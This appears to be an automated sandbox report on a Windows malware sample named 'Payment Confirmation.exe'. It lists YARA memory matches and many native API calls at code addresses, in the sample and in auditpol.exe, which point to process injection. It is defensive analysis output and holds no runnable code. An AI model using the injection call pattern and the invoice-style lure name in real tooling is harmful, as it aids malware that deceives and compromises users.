                Source: Yara matchFile source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Payment Confirmation.exe
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0042CCC3 NtClose,7_2_0042CCC3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12B60 NtClose,LdrInitializeThunk,7_2_01A12B60
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01A12DF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01A12C70
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A135C0 NtCreateMutant,LdrInitializeThunk,7_2_01A135C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A14340 NtSetContextThread,7_2_01A14340
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A14650 NtSuspendThread,7_2_01A14650
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12BA0 NtEnumerateValueKey,7_2_01A12BA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12B80 NtQueryInformationFile,7_2_01A12B80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12BE0 NtQueryValueKey,7_2_01A12BE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12BF0 NtAllocateVirtualMemory,7_2_01A12BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12AB0 NtWaitForSingleObject,7_2_01A12AB0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12AF0 NtWriteFile,7_2_01A12AF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12AD0 NtReadFile,7_2_01A12AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12DB0 NtEnumerateKey,7_2_01A12DB0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12DD0 NtDelayExecution,7_2_01A12DD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12D30 NtUnmapViewOfSection,7_2_01A12D30
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12D00 NtSetInformationFile,7_2_01A12D00
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12D10 NtMapViewOfSection,7_2_01A12D10
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12CA0 NtQueryInformationToken,7_2_01A12CA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12CF0 NtOpenProcess,7_2_01A12CF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12CC0 NtQueryVirtualMemory,7_2_01A12CC0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12C00 NtQueryInformationProcess,7_2_01A12C00
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12C60 NtCreateKey,7_2_01A12C60
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12FA0 NtQuerySection,7_2_01A12FA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12FB0 NtResumeThread,7_2_01A12FB0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12F90 NtProtectVirtualMemory,7_2_01A12F90
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12FE0 NtCreateFile,7_2_01A12FE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12F30 NtCreateSection,7_2_01A12F30
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12F60 NtCreateProcessEx,7_2_01A12F60
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12EA0 NtAdjustPrivilegesToken,7_2_01A12EA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12E80 NtReadVirtualMemory,7_2_01A12E80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12EE0 NtQueueApcThread,7_2_01A12EE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A12E30 NtWriteVirtualMemory,7_2_01A12E30
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A13090 NtSetValueKey,7_2_01A13090
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A13010 NtOpenDirectoryObject,7_2_01A13010
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A139B0 NtGetContextThread,7_2_01A139B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A13D10 NtOpenProcessToken,7_2_01A13D10
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A13D70 NtOpenThread,7_2_01A13D70
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D04340 NtSetContextThread,LdrInitializeThunk,10_2_03D04340
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D04650 NtSuspendThread,LdrInitializeThunk,10_2_03D04650
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03D02BF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03D02BE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03D02BA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02B60 NtClose,LdrInitializeThunk,10_2_03D02B60
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02AD0 NtReadFile,LdrInitializeThunk,10_2_03D02AD0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02AF0 NtWriteFile,LdrInitializeThunk,10_2_03D02AF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02FE0 NtCreateFile,LdrInitializeThunk,10_2_03D02FE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02FB0 NtResumeThread,LdrInitializeThunk,10_2_03D02FB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02F30 NtCreateSection,LdrInitializeThunk,10_2_03D02F30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03D02EE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03D02E80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02DD0 NtDelayExecution,LdrInitializeThunk,10_2_03D02DD0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03D02DF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03D02D10
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03D02D30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03D02CA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03D02C70
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02C60 NtCreateKey,LdrInitializeThunk,10_2_03D02C60
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D035C0 NtCreateMutant,LdrInitializeThunk,10_2_03D035C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D039B0 NtGetContextThread,LdrInitializeThunk,10_2_03D039B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02B80 NtQueryInformationFile,10_2_03D02B80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02AB0 NtWaitForSingleObject,10_2_03D02AB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02F90 NtProtectVirtualMemory,10_2_03D02F90
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02FA0 NtQuerySection,10_2_03D02FA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02F60 NtCreateProcessEx,10_2_03D02F60
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02EA0 NtAdjustPrivilegesToken,10_2_03D02EA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02E30 NtWriteVirtualMemory,10_2_03D02E30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02DB0 NtEnumerateKey,10_2_03D02DB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02D00 NtSetInformationFile,10_2_03D02D00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02CC0 NtQueryVirtualMemory,10_2_03D02CC0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02CF0 NtOpenProcess,10_2_03D02CF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D02C00 NtQueryInformationProcess,10_2_03D02C00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D03090 NtSetValueKey,10_2_03D03090
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D03010 NtOpenDirectoryObject,10_2_03D03010
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D03D70 NtOpenThread,10_2_03D03D70
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D03D10 NtOpenProcessToken,10_2_03D03D10
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03329790 NtDeleteFile,10_2_03329790
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033296A0 NtReadFile,10_2_033296A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03329530 NtCreateFile,10_2_03329530
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033299A0 NtAllocateVirtualMemory,10_2_033299A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03329840 NtClose,10_2_03329840
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_015BE0543_2_015BE054
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_057192603_2_05719260
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0571925A3_2_0571925A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075300063_2_07530006
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075764203_2_07576420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075784D83_2_075784D8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075793A03_2_075793A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_07575DDA3_2_07575DDA
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_07575DE83_2_07575DE8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075764123_2_07576412
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0757FB483_2_0757FB48
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0757FB383_2_0757FB38
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075700063_2_07570006
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A17573_2_078A1757
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A17683_2_078A1768
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A21083_2_078A2108
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A51003_2_078A5100
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A21183_2_078A2118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A6CA03_2_078A6CA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A00063_2_078A0006
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A001A3_2_078A001A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A00403_2_078A0040
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_078A04783_2_078A0478
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0757CF5A3_2_0757CF5A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075793203_2_07579320
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_075700403_2_07570040
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00418C137_2_00418C13
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00401C187_2_00401C18
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004031E07_2_004031E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004012407_2_00401240
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0041034A7_2_0041034A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004103537_2_00410353
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0042F3037_2_0042F303
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0040E5537_2_0040E553
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004105737_2_00410573
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004045357_2_00404535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00416DFE7_2_00416DFE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00402D8B7_2_00402D8B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00402D907_2_00402D90
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00416E037_2_00416E03
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004046357_2_00404635
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0040E6987_2_0040E698
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_0040E6A37_2_0040E6A3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA01AA7_2_01AA01AA
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A941A27_2_01A941A2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A981CC7_2_01A981CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D01007_2_019D0100
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7A1187_2_01A7A118
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A681587_2_01A68158
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A720007_2_01A72000
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA03E67_2_01AA03E6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EE3F07_2_019EE3F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9A3527_2_01A9A352
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A602C07_2_01A602C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A802747_2_01A80274
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA05917_2_01AA0591
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E05357_2_019E0535
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8E4F67_2_01A8E4F6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A844207_2_01A84420
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A924467_2_01A92446
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DC7C07_2_019DC7C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E07707_2_019E0770
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A047507_2_01A04750
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FC6E07_2_019FC6E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AAA9A67_2_01AAA9A6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E29A07_2_019E29A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F69627_2_019F6962
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019C68B87_2_019C68B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0E8F07_2_01A0E8F0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E28407_2_019E2840
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EA8407_2_019EA840
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A96BD77_2_01A96BD7
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9AB407_2_01A9AB40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DEA807_2_019DEA80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F8DBF7_2_019F8DBF
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019DADE07_2_019DADE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EAD007_2_019EAD00
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7CD1F7_2_01A7CD1F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A80CB57_2_01A80CB5
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0CF27_2_019D0CF2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0C007_2_019E0C00
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5EFA07_2_01A5EFA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D2FC87_2_019D2FC8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019ECFE07_2_019ECFE0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A22F287_2_01A22F28
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A00F307_2_01A00F30
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A82F307_2_01A82F30
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A54F407_2_01A54F40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F2E907_2_019F2E90
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9CE937_2_01A9CE93
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9EEDB7_2_01A9EEDB
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9EE267_2_01A9EE26
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0E597_2_019E0E59
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019EB1B07_2_019EB1B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AAB16B7_2_01AAB16B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1516C7_2_01A1516C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CF1727_2_019CF172
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A970E97_2_01A970E9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9F0E07_2_01A9F0E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E70C07_2_019E70C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8F0CC7_2_01A8F0CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A2739A7_2_01A2739A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9132D7_2_01A9132D
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019CD34C7_2_019CD34C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E52A07_2_019E52A0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A812ED7_2_01A812ED
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FB2C07_2_019FB2C0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7D5B07_2_01A7D5B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01AA95C37_2_01AA95C3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A975717_2_01A97571
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9F43F7_2_01A9F43F
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D14607_2_019D1460
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9F7B07_2_01A9F7B0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A916CC7_2_01A916CC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A256307_2_01A25630
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A759107_2_01A75910
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E99507_2_019E9950
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FB9507_2_019FB950
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E38E07_2_019E38E0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A4D8007_2_01A4D800
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FFB807_2_019FFB80
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A55BF07_2_01A55BF0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A1DBF97_2_01A1DBF9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FB767_2_01A9FB76
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A25AA07_2_01A25AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7DAAC7_2_01A7DAAC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A81AA37_2_01A81AA3
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A8DAC67_2_01A8DAC6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A53A6C7_2_01A53A6C
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FA497_2_01A9FA49
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A97A467_2_01A97A46
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FFDC07_2_019FFDC0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A97D737_2_01A97D73
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E3D407_2_019E3D40
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A91D5A7_2_01A91D5A
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FCF27_2_01A9FCF2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A59C327_2_01A59C32
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E1F927_2_019E1F92
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FFB17_2_01A9FFB1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A3FD27_2_019A3FD2
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A3FD57_2_019A3FD5
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A9FF097_2_01A9FF09
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E9EB07_2_019E9EB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDE3F010_2_03CDE3F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D903E610_2_03D903E6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8A35210_2_03D8A352
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D502C010_2_03D502C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7027410_2_03D70274
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D881CC10_2_03D881CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D901AA10_2_03D901AA
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D841A210_2_03D841A2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D5815810_2_03D58158
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC010010_2_03CC0100
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6A11810_2_03D6A118
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6200010_2_03D62000
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCC7C010_2_03CCC7C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CF475010_2_03CF4750
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD077010_2_03CD0770
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEC6E010_2_03CEC6E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9059110_2_03D90591
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD053510_2_03CD0535
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7E4F610_2_03D7E4F6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8244610_2_03D82446
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7442010_2_03D74420
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D86BD710_2_03D86BD7
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8AB4010_2_03D8AB40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCEA8010_2_03CCEA80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD29A010_2_03CD29A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9A9A610_2_03D9A9A6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE696210_2_03CE6962
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CFE8F010_2_03CFE8F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CB68B810_2_03CB68B8
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD284010_2_03CD2840
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDA84010_2_03CDA840
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC2FC810_2_03CC2FC8
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDCFE010_2_03CDCFE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D4EFA010_2_03D4EFA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D44F4010_2_03D44F40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D72F3010_2_03D72F30
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D12F2810_2_03D12F28
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CF0F3010_2_03CF0F30
